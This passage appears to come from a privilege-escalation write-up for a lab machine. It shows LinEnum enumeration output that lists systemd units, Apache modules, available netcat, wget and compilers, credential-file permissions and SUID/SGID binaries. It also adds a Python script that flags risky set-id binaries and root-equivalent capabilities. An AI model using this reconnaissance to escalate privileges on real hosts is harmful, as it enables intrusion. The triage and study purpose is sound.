-rw-r--r-- 1 root root 588 Jul 22 17:45 systemd-reboot.service
-rw-r--r-- 1 root root 833 Jul 22 17:45 systemd-remount-fs.service
-rw-r--r-- 1 root root 1.7K Jul 22 17:45 systemd-resolved.service
-rw-r--r-- 1 root root 724 Jul 22 17:45 systemd-rfkill.service
-rw-r--r-- 1 root root 537 Jul 22 17:45 systemd-suspend.service
-rw-r--r-- 1 root root 573 Jul 22 17:45 systemd-suspend-then-hibernate.service
-rw-r--r-- 1 root root 693 Jul 22 17:45 systemd-sysctl.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-timedated.service
-rw-r--r-- 1 root root 1.4K Jul 22 17:45 systemd-timesyncd.service
-rw-r--r-- 1 root root 659 Jul 22 17:45 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 764 Jul 22 17:45 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 744 Jul 22 17:45 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 985 Jul 22 17:45 systemd-udevd.service
-rw-r--r-- 1 root root 863 Jul 22 17:45 systemd-udev-settle.service
-rw-r--r-- 1 root root 755 Jul 22 17:45 systemd-udev-trigger.service
-rw-r--r-- 1 root root 797 Jul 22 17:45 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 794 Jul 22 17:45 systemd-update-utmp.service
-rw-r--r-- 1 root root 628 Jul 22 17:45 systemd-user-sessions.service
-rw-r--r-- 1 root root 690 Jul 22 17:45 systemd-volatile-root.service
-rw-r--r-- 1 root root 1.4K Jul 22 17:45 system-update-cleanup.service
lrwxrwxrwx 1 root root 21 Jul 22 17:45 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 Jul 22 17:45 urandom.service -> systemd-random-seed.service
-rw-r--r-- 1 root root 593 Jul 22 17:45 user@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 x11-common.service -> /dev/null
-rw-r--r-- 1 root root 346 Jul 16 19:14 apache2.service
-rw-r--r-- 1 root root 418 Jul 16 19:14 apache2@.service
-rw-r--r-- 1 root root 528 Jul 16 19:14 apache-htcacheclean.service
-rw-r--r-- 1 root root 537 Jul 16 19:14 apache-htcacheclean@.service
-rw-r--r-- 1 root root 2.4K Jul 14 20:20 redis-server@.service
-rw-r--r-- 1 root root 161 Jul 8 19:43 motd-news.timer
-rw-r--r-- 1 root root 505 Jun 10 19:05 dbus.service
-rw-r--r-- 1 root root 106 Jun 10 19:05 dbus.socket
-rw-r--r-- 1 root root 326 May 7 2019 apt-daily.service
-rw-r--r-- 1 root root 156 May 7 2019 apt-daily.timer
-rw-r--r-- 1 root root 238 May 7 2019 apt-daily-upgrade.service
-rw-r--r-- 1 root root 184 May 7 2019 apt-daily-upgrade.timer
-rw-r--r-- 1 root root 312 Apr 23 2019 console-setup.service
-rw-r--r-- 1 root root 287 Apr 23 2019 keyboard-setup.service
-rw-r--r-- 1 root root 330 Apr 23 2019 setvtrgb.service
-rw-r--r-- 1 root root 404 Apr 9 2019 ureadahead.service
-rw-r--r-- 1 root root 250 Apr 9 2019 ureadahead-stop.service
-rw-r--r-- 1 root root 242 Apr 9 2019 ureadahead-stop.timer
-rw-r--r-- 1 root root 412 Apr 4 2019 plymouth-halt.service
-rw-r--r-- 1 root root 426 Apr 4 2019 plymouth-kexec.service
lrwxrwxrwx 1 root root 27 Apr 4 2019 plymouth-log.service -> plymouth-read-write.service
-rw-r--r-- 1 root root 421 Apr 4 2019 plymouth-poweroff.service
-rw-r--r-- 1 root root 194 Apr 4 2019 plymouth-quit.service
-rw-r--r-- 1 root root 200 Apr 4 2019 plymouth-quit-wait.service
-rw-r--r-- 1 root root 244 Apr 4 2019 plymouth-read-write.service
-rw-r--r-- 1 root root 416 Apr 4 2019 plymouth-reboot.service
lrwxrwxrwx 1 root root 21 Apr 4 2019 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root 532 Apr 4 2019 plymouth-start.service
-rw-r--r-- 1 root root 291 Apr 4 2019 plymouth-switch-root.service
-rw-r--r-- 1 root root 490 Apr 4 2019 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root 467 Apr 4 2019 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root 368 Jan 9 2019 irqbalance.service
-rw-r--r-- 1 root root 92 Oct 15 2018 fstrim.service
-rw-r--r-- 1 root root 170 Oct 15 2018 fstrim.timer
-rw-r--r-- 1 root root 189 Oct 15 2018 uuidd.service
-rw-r--r-- 1 root root 126 Oct 15 2018 uuidd.socket
-rw-r--r-- 1 root root 618 Oct 15 2018 friendly-recovery.service
-rw-r--r-- 1 root root 172 Oct 15 2018 friendly-recovery.target
-rw-r--r-- 1 root root 258 Oct 15 2018 networkd-dispatcher.service
-rw-r--r-- 1 root root 173 Aug 6 2018 motd-news.service
-rw-r--r-- 1 root root 290 Apr 24 2018 rsyslog.service
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel5.target.wants
-rw-r--r-- 1 root root 544 Mar 22 2018 apparmor.service
-rw-r--r-- 1 root root 919 Jan 28 2018 basic.target
-rw-r--r-- 1 root root 419 Jan 28 2018 bluetooth.target
-rw-r--r-- 1 root root 465 Jan 28 2018 cryptsetup-pre.target
-rw-r--r-- 1 root root 412 Jan 28 2018 cryptsetup.target
-rw-r--r-- 1 root root 750 Jan 28 2018 dev-hugepages.mount
-rw-r--r-- 1 root root 665 Jan 28 2018 dev-mqueue.mount
-rw-r--r-- 1 root root 471 Jan 28 2018 emergency.target
-rw-r--r-- 1 root root 541 Jan 28 2018 exit.target
-rw-r--r-- 1 root root 480 Jan 28 2018 final.target
-rw-r--r-- 1 root root 506 Jan 28 2018 getty-pre.target
-rw-r--r-- 1 root root 500 Jan 28 2018 getty.target
-rw-r--r-- 1 root root 598 Jan 28 2018 graphical.target
-rw-r--r-- 1 root root 527 Jan 28 2018 halt.target
-rw-r--r-- 1 root root 509 Jan 28 2018 hibernate.target
-rw-r--r-- 1 root root 530 Jan 28 2018 hybrid-sleep.target
-rw-r--r-- 1 root root 593 Jan 28 2018 initrd-fs.target
-rw-r--r-- 1 root root 561 Jan 28 2018 initrd-root-device.target
-rw-r--r-- 1 root root 566 Jan 28 2018 initrd-root-fs.target
-rw-r--r-- 1 root root 754 Jan 28 2018 initrd-switch-root.target
-rw-r--r-- 1 root root 763 Jan 28 2018 initrd.target
-rw-r--r-- 1 root root 541 Jan 28 2018 kexec.target
-rw-r--r-- 1 root root 435 Jan 28 2018 local-fs-pre.target
-rw-r--r-- 1 root root 547 Jan 28 2018 local-fs.target
-rw-r--r-- 1 root root 445 Jan 28 2018 machine.slice
-rw-r--r-- 1 root root 532 Jan 28 2018 multi-user.target
-rw-r--r-- 1 root root 505 Jan 28 2018 network-online.target
-rw-r--r-- 1 root root 502 Jan 28 2018 network-pre.target
-rw-r--r-- 1 root root 521 Jan 28 2018 network.target
-rw-r--r-- 1 root root 554 Jan 28 2018 nss-lookup.target
-rw-r--r-- 1 root root 513 Jan 28 2018 nss-user-lookup.target
-rw-r--r-- 1 root root 394 Jan 28 2018 paths.target
-rw-r--r-- 1 root root 592 Jan 28 2018 poweroff.target
-rw-r--r-- 1 root root 417 Jan 28 2018 printer.target
-rw-r--r-- 1 root root 745 Jan 28 2018 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 655 Jan 28 2018 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 583 Jan 28 2018 reboot.target
-rw-r--r-- 1 root root 549 Jan 28 2018 remote-cryptsetup.target
-rw-r--r-- 1 root root 436 Jan 28 2018 remote-fs-pre.target
-rw-r--r-- 1 root root 522 Jan 28 2018 remote-fs.target
-rw-r--r-- 1 root root 492 Jan 28 2018 rescue.target
-rw-r--r-- 1 root root 540 Jan 28 2018 rpcbind.target
-rw-r--r-- 1 root root 442 Jan 28 2018 shutdown.target
-rw-r--r-- 1 root root 402 Jan 28 2018 sigpwr.target
-rw-r--r-- 1 root root 460 Jan 28 2018 sleep.target
-rw-r--r-- 1 root root 449 Jan 28 2018 slices.target
-rw-r--r-- 1 root root 420 Jan 28 2018 smartcard.target
-rw-r--r-- 1 root root 396 Jan 28 2018 sockets.target
-rw-r--r-- 1 root root 420 Jan 28 2018 sound.target
-rw-r--r-- 1 root root 503 Jan 28 2018 suspend.target
-rw-r--r-- 1 root root 393 Jan 28 2018 swap.target
-rw-r--r-- 1 root root 795 Jan 28 2018 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 558 Jan 28 2018 sysinit.target
-rw-r--r-- 1 root root 767 Jan 28 2018 sys-kernel-config.mount
-rw-r--r-- 1 root root 710 Jan 28 2018 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.4K Jan 28 2018 syslog.socket
-rw-r--r-- 1 root root 704 Jan 28 2018 systemd-ask-password-console.path
-rw-r--r-- 1 root root 632 Jan 28 2018 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 564 Jan 28 2018 systemd-initctl.socket
-rw-r--r-- 1 root root 1.2K Jan 28 2018 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 882 Jan 28 2018 systemd-journald.socket
-rw-r--r-- 1 root root 631 Jan 28 2018 systemd-networkd.socket
-rw-r--r-- 1 root root 657 Jan 28 2018 systemd-rfkill.socket
-rw-r--r-- 1 root root 490 Jan 28 2018 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 635 Jan 28 2018 systemd-udevd-control.socket
-rw-r--r-- 1 root root 610 Jan 28 2018 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 445 Jan 28 2018 system.slice
-rw-r--r-- 1 root root 592 Jan 28 2018 system-update.target
-rw-r--r-- 1 root root 445 Jan 28 2018 timers.target
-rw-r--r-- 1 root root 435 Jan 28 2018 time-sync.target
-rw-r--r-- 1 root root 457 Jan 28 2018 umount.target
-rw-r--r-- 1 root root 432 Jan 28 2018 user.slice
-rw-r--r-- 1 root root 493 Jan 25 2018 ssh.service
-rw-r--r-- 1 root root 244 Jan 25 2018 ssh@.service
lrwxrwxrwx 1 root root 9 Jan 18 2018 sudo.service -> /dev/null
-rw-r--r-- 1 root root 155 Jan 17 2018 phpsessionclean.service
-rw-r--r-- 1 root root 144 Jan 17 2018 phpsessionclean.timer
-rw-r--r-- 1 root root 216 Jan 16 2018 ssh.socket
-rw-r--r-- 1 root root 741 Dec 18 2017 accounts-daemon.service
-rw-r--r-- 1 root root 251 Nov 16 2017 cron.service
-rw-r--r-- 1 root root 266 Aug 15 2017 ufw.service
-rw-r--r-- 1 root root 626 Nov 28 2016 ifup@.service
-rw-r--r-- 1 root root 735 Nov 25 2016 networking.service
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Jul 16 19:14 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Apr 4 2019 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jul 22 17:45 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Jul 22 17:45 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jul 22 17:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jun 10 19:05 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 29 Apr 4 2019 plymouth-quit-wait.service -> ../plymouth-quit-wait.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Apr 4 2019 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Apr 4 2019 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jul 22 17:45 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jul 22 17:45 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jul 22 17:45 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jul 22 17:45 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jul 22 17:45 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jul 22 17:45 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jul 22 17:45 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jul 22 17:45 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jul 22 17:45 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 27 Jul 22 17:45 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 36 Jul 22 17:45 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jul 22 17:45 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jul 22 17:45 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 24 Jul 22 17:45 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Apr 4 2019 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jul 22 17:45 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 17:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jul 22 17:45 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 17:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jul 22 17:45 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jul 22 17:45 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jun 10 19:05 dbus.socket -> ../dbus.socket

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jul 22 17:45 debian.conf

/lib/systemd/system/user@.service.d:
total 4.0K
-rw-r--r-- 1 root root 125 Jul 22 17:45 timeout.conf

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-generators:
total 200K
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-debug-generator
-rwxr-xr-x 1 root root 31K Jul 22 17:45 systemd-fstab-generator
-rwxr-xr-x 1 root root 14K Jul 22 17:45 systemd-getty-generator
-rwxr-xr-x 1 root root 26K Jul 22 17:45 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-rc-local-generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-system-update-generator
-rwxr-xr-x 1 root root 31K Jul 22 17:45 systemd-sysv-generator
-rwxr-xr-x 1 root root 14K Jul 22 17:45 systemd-veritysetup-generator
-rwxr-xr-x 1 root root 286 Jun 21 15:07 friendly-recovery

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm

/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 645 Jan 28 2018 80-container-host0.network
-rw-r--r-- 1 root root 718 Jan 28 2018 80-container-ve.network
-rw-r--r-- 1 root root 704 Jan 28 2018 80-container-vz.network
-rw-r--r-- 1 root root 412 Jan 28 2018 99-default.link

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 951 Jan 28 2018 90-systemd.preset

/lib/systemd/system-shutdown:
total 0

### SOFTWARE
#######################################
[-] Sudo version:
Sudo version 1.8.21p2

[-] Apache version:


Server version: Apache/2.4.29 (Ubuntu)
Server built: 2019-07-16T18:14:45

[-] Apache user configuration:


APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:


Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
actions_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
rewrite_module (shared)
setenvif_module (shared)
status_module (shared)

### INTERESTING FILES
####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc

[-] Installed compilers:


ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler
ii g++-7 7.4.0-1ubuntu1~18.04.1 amd64 GNU C++ compiler
ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler
ii gcc-7 7.4.0-1ubuntu1~18.04.1 amd64 GNU C compiler

[-] Can we read/write sensitive files:


-rw-r--r-- 1 root root 1382 Aug 25 23:48 /etc/passwd
-rw-r--r-- 1 root root 709 Oct 25 16:38 /etc/group
-rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile
-rw-r----- 1 root shadow 935 Aug 26 03:50 /etc/shadow

[-] SUID files:


-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun 10 19:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 18448 Jun 28 12:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 12:05 /bin/ping
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount

[-] SGID files:


-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 30800 Oct 15 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage

[+] Files with POSIX capabilities set:


/usr/bin/mtr-packet = cap_net_raw+ep
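Reading a SUID/SGID list by eye is how findings get missed, so here is an added example (not part of this writeup) that triages the listing above mechanically. It parses the `ls -l` lines and the capabilities line as LinEnum prints them and flags only set-id binaries that are world-writable or that fall outside a known-good baseline, plus file capabilities that amount to root. The baseline used here is an assumption for illustration: it is simply the set of paths in this box's own listing, which are all stock Ubuntu 18.04 binaries; in practice you would build it from a clean image of the same release. The entries /tmp/backup-helper, /usr/local/bin/readshadow and /usr/local/bin/pyhelper are constructed, planted lines that do not exist on the box; they are there only to show what a hit looks like.

```python
import re

# Constructed input: the SUID/SGID lines from the LinEnum output above, verbatim.
STOCK_LISTING = """\
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun 10 19:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 18448 Jun 28 12:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 12:05 /bin/ping
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 30800 Oct 15 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
"""
# Constructed, planted lines that are NOT on the box; they exist only to show hits.
PLANTED_LISTING = """\
-rwsrwxrwx 1 root root 8776 Oct 26 2019 /tmp/backup-helper
-rwxr-sr-x 1 root shadow 8776 Oct 26 2019 /usr/local/bin/readshadow
"""
# Capabilities: the real mtr-packet line from the listing plus one planted line.
CAPS_OUTPUT = """\
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/local/bin/pyhelper = cap_setuid+ep
"""
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
                  "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
PRIVILEGED_GROUPS = {"root", "shadow", "disk", "sudo", "adm", "docker", "lxd"}

def parse_ls_line(line):
    """Split an `ls -l` line into (mode, owner, group, path); the date is 3 tokens."""
    parts = line.split(None, 8)
    if len(parts) != 9 or len(parts[0]) != 10:
        return None
    return parts[0], parts[2], parts[3], parts[8]

def baseline_paths(listing):
    """Assumed baseline: every path in a known-good listing of the same release."""
    return {p[3] for p in map(parse_ls_line, listing.splitlines()) if p}

def triage_setid(listing, baseline):
    """Flag set-id binaries that are world-writable or outside the baseline."""
    findings = []
    for line in listing.splitlines():
        parsed = parse_ls_line(line)
        if not parsed:
            continue
        mode, owner, group, path = parsed
        setuid, setgid = mode[3] in "sS", mode[6] in "sS"
        if not (setuid or setgid):
            continue
        reasons = []
        if mode[8] == "w":
            reasons.append("world-writable set-id binary: anyone can replace its code")
        if path not in baseline:
            if setuid:
                reasons.append("setuid-%s binary not in the baseline" % owner)
            if setgid and group in PRIVILEGED_GROUPS:
                reasons.append("setgid-%s binary not in the baseline" % group)
        if reasons:
            findings.append({"path": path, "mode": mode, "reasons": reasons})
    return findings

def triage_caps(getcap_output):
    """Flag file capabilities that amount to root (both getcap output styles)."""
    findings = []
    for line in getcap_output.splitlines():
        path, sep, caps = line.partition(" = ")       # older libcap: "path = caps"
        if not sep:
            path, _, caps = line.partition(" ")       # newer libcap: "path caps"
        names = set(re.split(r"[+=]", caps.strip())[0].split(","))
        hits = sorted(names & DANGEROUS_CAPS)
        if hits:
            findings.append({"path": path.strip(), "caps": hits})
    return findings

if __name__ == "__main__":
    base = baseline_paths(STOCK_LISTING)
    for f in triage_setid(STOCK_LISTING + PLANTED_LISTING, base) + triage_caps(CAPS_OUTPUT):
        print(f)
```

Run against the box's own listing with its own baseline the triage returns nothing, which matches the rest of this writeup: none of these binaries is the way to root here. The planted lines show the two classes that would have been worth a closer look: a set-id binary anyone can overwrite, and a setgid-shadow or cap_setuid file that a package did not put there.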

[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):


-rw-r--r-- 1 root root 2683 Jan 17 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf
-rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf
-rw-r--r-- 1 root root 191 Feb 7 2018 /etc/libaudit.conf
-rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf
-rw-r--r-- 1 root root 552 Apr 4 2018 /etc/pam.conf
-rw-r--r-- 1 root root 144 Aug 24 11:35 /etc/kernel-img.conf
-rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf
-rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf
-rw-r--r-- 1 root root 350 Aug 24 11:33 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 5898 Aug 24 11:27 /etc/ca-certificates.conf
